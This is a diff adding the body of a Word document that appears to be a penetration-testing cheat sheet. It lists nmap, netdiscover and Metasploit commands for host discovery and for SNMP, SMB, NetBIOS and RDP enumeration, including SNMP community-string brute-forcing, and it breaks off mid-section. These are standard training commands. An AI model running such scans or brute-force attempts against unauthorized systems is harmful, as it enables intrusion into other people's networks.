--- a/cheatsheet.docx
+++ b/cheatsheet.docx
@@ -2,6 +2,1117 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1. RECON / HOST DISCOVERY</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netdiscover</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -r &lt;subnet&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;subnet&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -A -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;target&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>📡</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2. SNMP ENUMERATION (VERY IMPORTANT)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔍</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Check SNMP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-check &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sU</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 161 &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔑</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Brute SNMP Community Strings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sU</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 161 --script=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-brute &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>👉</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Common result:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">public </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">private </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🧠</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Get Info via Scripts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sU</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 161 --script=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-processes &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sU</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 161 --script=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-interfaces &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>💥</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Metasploit SNMP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">search </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>use auxiliary/scanner/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>snmp_login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>set RHOSTS &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🖥️</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3. SMB ENUMERATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔍</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Scan SMB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 445 &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>📂</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Enumerate Shares &amp; Users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 445 --script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>enum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-shares &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 445 --script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>enum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-users &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>🔐</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> With Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 445 --script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>enum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-users \</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>--script-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smbusername</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=&lt;user</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>&gt;,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smbpassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=&lt;pass&gt; &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🧾</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4. NETBIOS ENUMERATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nbstat.nse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nbtstat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -A &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>👉</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Gives:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hostname</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Domain name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔐</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5. RDP ATTACK / ENUMERATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🔍</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Scan RDP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 3389 &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>🧠</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Metasploit RDP Scanner</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -q</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">search </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rdp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>use auxiliary/scanner/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rdp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rdp_scanner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>set RHOSTS &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>set RPORT 3333   # if custom port</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict>
+          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
